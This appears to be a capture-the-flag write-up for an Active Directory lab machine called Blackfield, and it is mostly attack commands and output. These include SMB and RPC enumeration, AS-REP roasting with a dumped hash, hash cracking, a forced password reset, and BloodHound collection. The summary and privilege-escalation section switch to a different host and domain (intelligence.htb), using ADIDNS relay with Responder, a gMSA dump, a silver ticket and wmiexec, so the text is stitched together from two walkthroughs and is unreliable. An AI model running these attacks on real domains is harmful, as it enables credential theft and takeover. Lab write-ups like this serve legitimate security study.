Blackfield
Summary
Multiple open ports revealed Active Directory environment (LDAP, Kerberos, SMB, DNS, HTTP).
Extracted usernames using metadata from
.pdffiles via directory fuzzing.Discovered default password from internal onboarding document.
Gained initial shell via SMB share enumeration using valid credentials.
Discovered PowerShell script that sends web checks to DNS records, enabling ADIDNS-based NTLM relay.
Captured Ted.Graves’s NTLM hash using Responder and cracked it.
Used BloodHound to find
ReadGMSAPasswordprivilege onsvc_intaccount.Retrieved svc_int hash using gMSADumper and generated a Silver Ticket as Administrator.
Gained full access via Kerberos-authenticated
wmiexec.py.
🧵 Let's Unpack
🔍Enumeration
sudo nmap -sC -sV -A -T5 -p- 10.10.10.248Open ports included:
LDAP (389, 636, 3268, 3269)
Kerberos (88, 464)
SMB (139, 445)
HTTP (80, 5985)
DNS (53)
RPC (135, 593, 49667+)
Others related to Active Directory services
Anonymous SMB enumeration using enum4linux and smbclient revealed no useful info, but identified domain: intelligence.htb.
RPCClient
rpcclient $> lsaquery
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290SMB Client
# using nmblookup
nmblookup -A 10.10.10.192
# smbclient
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
# crackmapexec
crackmapexec smb 10.10.10.192 -u '' -p '' -M spider_plus
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\:
SPIDER_P... 10.10.10.192 445 DC01 [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192 445 DC01 [*] DIR: ['print$']
SPIDER_P... 10.10.10.192 445 DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192 445 DC01 [*] SIZE: 51200
SPIDER_P... 10.10.10.192 445 DC01 [*] OUTPUT: /tmp/cme_spider_plus
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
# using MSF
msf6 auxiliary(scanner/smb/smb_lookupsid) > run
[*] 10.10.10.192:445 - PIPE(LSARPC) LOCAL(BLACKFIELD - 5-21-4194615774-2175524697-3563712290) DOMAIN(BLACKFIELD - 5-21-4194615774-2175524697-3563712290)
[*] 10.10.10.192:445 - BLACKFIELD [ ]
# enum4linux
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
## DC
domain Controller -> blackfield.localKerbrute Enum
kerbrute userenum -d dc01.blackfield.local /usr/share/seclists/Usernames/top-usernames-shortlist.txt
2024/06/12 23:50:12 > [+] VALID USERNAME: audit2020@blackfield.local
2024/06/12 23:52:13 > [+] support has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$support@BLACKFIELD.LOCAL:cc6939c0b17716f2ed1778099b862921$448d7ccfccee671614ca6a6d53fbfc17ccd2ad2aec0101559ef760b0ee1add202b3b71930d3a5e2007f998c09b98d8e589ff155d4c8df4ebb1c1b36305d57acd8e812782f683cd3418e37f552fb3f60e8d7dd82692d2c08193dec3a8d2d3816bb13f53bcd8df70bd8e67f577e34a9ab237a2dbeec2903bed393d2d8edbb437707eac2d6246f9a0a7b0002f748e539ce7f3b60240be849910931a4627e101de566b78881940ac92aae8855faccfd593b61c3b7d5a0d00ff1cdd717c3d3dc5ed9ba56fb653774fdcb9ee234691cb9cb53183405fa58963a1b693e7100ca8e2fd31a432173198c4fd4aad0f25463cb96bf579ee16c67cbbe95482b06658c015a8280205c9cbed2cef4b
2024/06/12 23:52:13 > [+] VALID USERNAME: support@blackfield.local
2024/06/12 23:52:19 > [+] VALID USERNAME: svc_backup@blackfield.local
Cracking the hash - ASREP token
sudo hashcat -m 18200 hash.asrep /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# Cracked the hash using john instead
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL) Enumerating using valid credentials
# Running Bloodhound
bloodhound-python -d blackfield.local -u support -p '<PASS>' -ns 10.10.10.192 -c All
Findings
The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL's password without knowing that user's current password.
Let’s try to change password using rpcClient
# log into rpcclient
rpcclient -U "support" 10.10.10.192
# change password (Incorrect way of changing password)
chgpasswd audit2020@blackfield.local Password@123 Password@123
# correct way
setuserinfo2 audit2020 23 'Password@123'
# verify if password change was a success
crackmapexec smb 10.10.10.192 -u audit2020@blackfield.local -p 'Password@123' --continue-on-succes
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020@blackfield.local:Password@123 The computer DC01.BLACKFIELD.LOCAL has the DS-Replication-Get-Changes and the DS-Replication-Get-Changes-All privilege on the domain BLACKFIELD.LOCAL.
Privilege Escalation
Part 1: NTLM Relay via ADIDNS
Exploited ADIDNS record creation via
dnstool.py:./dnstool.py -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248 -a add -r webl -d 10.10.14.13 -t ARan
responderon attack box and waited for the script to trigger:sudo responder -I tun0Captured NTLMv2 hash for
Ted.Graves.Cracked hash and got creds:
Username: Ted.Graves Password: Mr.Teddy
Part 2: BloodHound & GMSA Abuse
Ran BloodHound collection using
bloodhound-python:bloodhound-python -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -ns 10.10.10.248 -c AllFound
Ted.Gravesis part of a group withReadGMSAPasswordrights onsvc_int.Dumped GMSA password using:
./gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l 10.10.10.248Output:
svc_int$:aes256-cts-hmac-sha1-96:<HASH>
Part 3: Silver Ticket
Created Silver Ticket as Administrator:
getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :<svc_int_hash>Exported ticket:
export KRB5CCNAME=Administrator.ccacheExecuted command with elevated privileges:
wmiexec.py -k -no-pass dc.intelligence.htb→ Got shell as Administrator 🎉
Last updated